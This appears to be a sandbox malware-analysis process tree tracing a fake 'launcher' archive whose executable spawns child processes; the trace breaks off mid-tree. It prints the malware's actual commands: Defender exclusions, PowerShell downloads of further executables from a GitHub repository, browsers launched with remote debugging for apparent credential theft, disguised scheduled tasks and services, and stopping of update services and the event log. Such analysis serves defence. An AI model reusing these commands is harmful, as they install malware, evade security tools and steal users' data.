  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=4956,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4912 /prefetch:1
  2⤵
  PID:5904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6288,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6548 /prefetch:8
  2⤵
  PID:5256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=208,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4856 /prefetch:8
  2⤵
  PID:5220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5084,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6344 /prefetch:8
  2⤵
  PID:5208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6632,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6616 /prefetch:8
  2⤵
  PID:5228

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:3404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4888

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5600

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Iаuncher_v9.1.rar"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:5168
- C:\Users\Admin\AppData\Local\Temp\7zO034A1978\S0FTWARE.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO034A1978\S0FTWARE.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\kdbmvxbera', 'C:\Users', 'C:\ProgramData'"
    3⤵
    PID:1936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\kdbmvxbera', 'C:\Users', 'C:\ProgramData'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\kdbmvxbera\ejthkcxxlz.exe'"
    3⤵
    PID:5928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\kdbmvxbera\ejthkcxxlz.exe'"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious behavior: EnumeratesProcesses
      PID:5920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\kdbmvxbera\lkmqbmmk.exe'"
    3⤵
    PID:440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\kdbmvxbera\lkmqbmmk.exe'"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious behavior: EnumeratesProcesses
      PID:1976
- - C:\Users\Admin\AppData\Local\kdbmvxbera\ejthkcxxlz.exe
    "C:\Users\Admin\AppData\Local\kdbmvxbera\ejthkcxxlz.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:5148
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:4372
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff86d14dcf8,0x7ff86d14dd04,0x7ff86d14dd10
        5⤵
        
        PID:1044
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:2600
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff86d14dcf8,0x7ff86d14dd04,0x7ff86d14dd10
        5⤵
        
        PID:628
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1512,i,12501371237643493621,12571396649087439836,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2036 /prefetch:3
        5⤵
        
        PID:5144
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2072,i,12501371237643493621,12571396649087439836,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2068 /prefetch:2
        5⤵
        
        PID:5800
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2300,i,12501371237643493621,12571396649087439836,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2444 /prefetch:8
        5⤵
        
        PID:2268
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,12501371237643493621,12571396649087439836,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3276 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3920
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3248,i,12501371237643493621,12571396649087439836,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3320 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2348
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,12501371237643493621,12571396649087439836,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4556 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4004
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:5976
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff86d14dcf8,0x7ff86d14dd04,0x7ff86d14dd10
        5⤵
        
        PID:5988
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1916,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=1932 /prefetch:2
        5⤵
        
        PID:5476
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:3
        5⤵
        
        PID:6004
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2320,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=2908 /prefetch:8
        5⤵
        
        PID:1844
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=3256 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5492
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=3296 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1736
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4296,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=4496 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2544
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4744,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=5036 /prefetch:8
        5⤵
        
        PID:772
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5500,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=5520 /prefetch:8
        5⤵
        
        PID:2148
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:5164
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        5⤵
        Uses browser remote debugging
        
        PID:2524
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x184,0x2f4,0x7ff85ec6f208,0x7ff85ec6f214,0x7ff85ec6f220
        6⤵
        
        PID:2540
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2096,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:2
        6⤵
        
        PID:5752
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1908,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=2356 /prefetch:3
        6⤵
        
        PID:4120
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2536,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:8
        6⤵
        
        PID:3476
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3528,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=3616 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5508
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5384
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4164,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=4208 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1844
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4180,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=4260 /prefetch:2
        6⤵
        Uses browser remote debugging
        
        PID:2380
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3840,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=5020 /prefetch:8
        6⤵
        
        PID:3940
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5320,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:8
        6⤵
        
        PID:6040
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5596,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:8
        6⤵
        
        PID:4988
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5600,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=5656 /prefetch:8
        6⤵
        
        PID:968
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\0zcb1" & exit
      4⤵
      PID:5412
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        5⤵
        Delays execution with timeout.exe
        
        PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\kdbmvxbera\btdkb.exe'"
    3⤵
    PID:5280
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\kdbmvxbera\btdkb.exe'"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious behavior: EnumeratesProcesses
      PID:5124
- - C:\Users\Admin\AppData\Local\kdbmvxbera\lkmqbmmk.exe
    "C:\Users\Admin\AppData\Local\kdbmvxbera\lkmqbmmk.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4168
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4636
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2188
- - C:\Users\Admin\AppData\Local\kdbmvxbera\btdkb.exe
    "C:\Users\Admin\AppData\Local\kdbmvxbera\btdkb.exe"
    3⤵
    PID:3240
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:668
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:756
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:3320
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:4088
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:692
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:4492
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:3204
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:3040
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:5608
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:2528
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:2004
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:3732
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
      4⤵
      Launches sc.exe
      PID:776
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:3144
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:1696
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
      4⤵
      Launches sc.exe
      PID:5404
- C:\Users\Admin\AppData\Local\Temp\7zO034CAB18\S0FTWARE.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO034CAB18\S0FTWARE.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\gkjmelg', 'C:\Users', 'C:\ProgramData'"
    3⤵
    PID:1744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\gkjmelg', 'C:\Users', 'C:\ProgramData'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\gkjmelg\kfwttlf.exe'"
    3⤵
    PID:5000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\gkjmelg\kfwttlf.exe'"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious behavior: EnumeratesProcesses
      PID:5288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\gkjmelg\yadltyouruy.exe'"
    3⤵
    PID:2832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\gkjmelg\yadltyouruy.exe'"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious behavior: EnumeratesProcesses
      PID:2636
- - C:\Users\Admin\AppData\Local\gkjmelg\kfwttlf.exe
    "C:\Users\Admin\AppData\Local\gkjmelg\kfwttlf.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5512
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:3512
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
